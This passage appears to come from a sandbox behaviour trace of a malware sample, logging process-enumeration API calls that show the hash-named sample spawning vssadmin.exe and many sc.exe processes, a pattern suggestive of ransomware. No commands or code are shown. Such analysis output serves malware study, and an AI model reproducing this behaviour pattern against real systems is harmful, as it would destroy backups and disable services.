(_String="backgroundTaskHost.exe") returned 0x16 [0064.908] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0064.909] wcslen (_String="audiodg.exe") returned 0xb [0064.909] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe")) returned 1 [0064.910] wcslen (_String="f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe") returned 0x44 [0064.910] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0064.911] wcslen (_String="vssadmin.exe") returned 0xc [0064.911] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xb68, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0064.912] wcslen (_String="conhost.exe") returned 0xb [0064.912] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0064.912] wcslen (_String="sc.exe") returned 0x6 [0064.912] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0064.913] wcslen (_String="sc.exe") returned 0x6 [0064.913] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0064.914] wcslen (_String="sc.exe") returned 0x6 [0064.914] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0064.915] wcslen (_String="sc.exe") returned 0x6 [0064.915] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0064.916] wcslen (_String="sc.exe") returned 0x6 [0064.916] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0064.917] wcslen (_String="sc.exe") returned 0x6 [0064.917] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0064.918] wcslen (_String="sc.exe") returned 0x6 [0064.918] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x758, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0064.918] wcslen (_String="sc.exe") returned 0x6 [0064.918] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0064.919] wcslen (_String="sc.exe") returned 0x6 [0064.919] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0064.920] wcslen (_String="sc.exe") returned 0x6 [0064.920] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0064.921] wcslen (_String="sc.exe") returned 0x6 [0064.921] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0064.922] wcslen (_String="sc.exe") returned 0x6 [0064.922] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0064.923] wcslen (_String="sc.exe") returned 0x6 [0064.923] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0064.924] wcslen (_String="sc.exe") returned 0x6 [0064.924] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.023] wcslen (_String="sc.exe") returned 0x6 [0065.023] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.024] wcslen (_String="sc.exe") returned 0x6 [0065.024] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.025] wcslen (_String="sc.exe") returned 0x6 [0065.025] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xafc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.026] wcslen (_String="conhost.exe") returned 0xb [0065.026] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x8d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.026] wcslen (_String="conhost.exe") returned 0xb [0065.026] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.027] wcslen (_String="conhost.exe") returned 0xb [0065.027] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xb0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.028] wcslen (_String="conhost.exe") returned 0xb [0065.028] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xb34, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.029] wcslen (_String="conhost.exe") returned 0xb [0065.029] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xb64, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.030] wcslen (_String="conhost.exe") returned 0xb [0065.030] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbd4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.031] wcslen (_String="conhost.exe") returned 0xb [0065.031] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x758, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.031] wcslen (_String="conhost.exe") returned 0xb [0065.031] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa34, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.032] wcslen (_String="conhost.exe") returned 0xb [0065.032] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x82c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.033] wcslen (_String="conhost.exe") returned 0xb [0065.033] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.034] wcslen (_String="conhost.exe") returned 0xb [0065.034] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xaf8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.035] wcslen (_String="conhost.exe") returned 0xb [0065.035] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x38c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.036] wcslen (_String="conhost.exe") returned 0xb [0065.036] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.036] wcslen (_String="conhost.exe") returned 0xb [0065.036] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.037] wcslen (_String="conhost.exe") returned 0xb [0065.037] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbc4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.038] wcslen (_String="conhost.exe") returned 0xb [0065.038] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xcfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.039] wcslen (_String="sc.exe") returned 0x6 [0065.039] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.040] wcslen (_String="sc.exe") returned 0x6 [0065.040] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.041] wcslen (_String="sc.exe") returned 0x6 [0065.041] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.041] wcslen (_String="sc.exe") returned 0x6 [0065.041] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.042] wcslen (_String="sc.exe") returned 0x6 [0065.042] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.043] wcslen (_String="sc.exe") returned 0x6 [0065.043] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.044] wcslen (_String="sc.exe") returned 0x6 [0065.044] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.045] wcslen (_String="sc.exe") returned 0x6 [0065.045] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.046] wcslen (_String="sc.exe") returned 0x6 [0065.046] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.047] wcslen (_String="sc.exe") returned 0x6 [0065.047] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.047] wcslen (_String="sc.exe") returned 0x6 [0065.047] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.048] wcslen (_String="sc.exe") returned 0x6 [0065.048] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.049] wcslen (_String="sc.exe") returned 0x6 [0065.049] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.050] wcslen (_String="sc.exe") returned 0x6 [0065.050] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.051] wcslen (_String="sc.exe") returned 0x6 [0065.051] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.052] wcslen (_String="sc.exe") returned 0x6 [0065.052] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.052] wcslen (_String="sc.exe") returned 0x6 [0065.052] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.053] wcslen (_String="sc.exe") returned 0x6 [0065.053] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.054] wcslen (_String="sc.exe") returned 0x6 [0065.054] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.055] wcslen (_String="sc.exe") returned 0x6 [0065.055] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.056] wcslen (_String="sc.exe") returned 0x6 [0065.056] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.057] wcslen (_String="sc.exe") returned 0x6 [0065.057] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.057] wcslen (_String="sc.exe") returned 0x6 [0065.057] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.064] wcslen (_String="sc.exe") returned 0x6 [0065.064] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.064] wcslen (_String="sc.exe") returned 0x6 [0065.064] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.065] wcslen (_String="sc.exe") returned 0x6 [0065.065] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.066] wcslen (_String="sc.exe") returned 0x6 [0065.066] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.067] wcslen (_String="sc.exe") returned 0x6 [0065.067] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.068] wcslen (_String="sc.exe") returned 0x6 [0065.068] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xde4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.069] wcslen (_String="sc.exe") returned 0x6 [0065.069] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.069] wcslen (_String="sc.exe") returned 0x6 [0065.069] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.071] wcslen (_String="sc.exe") returned 0x6 [0065.071] Process32NextW (in: hSnapshot=0x198, lppe=0x84b0fdf4e0 | out: lppe=0x84b0fdf4e0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb14, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0065.072] wcslen (_String="sc.exe") returned 0x6 [0065.072] 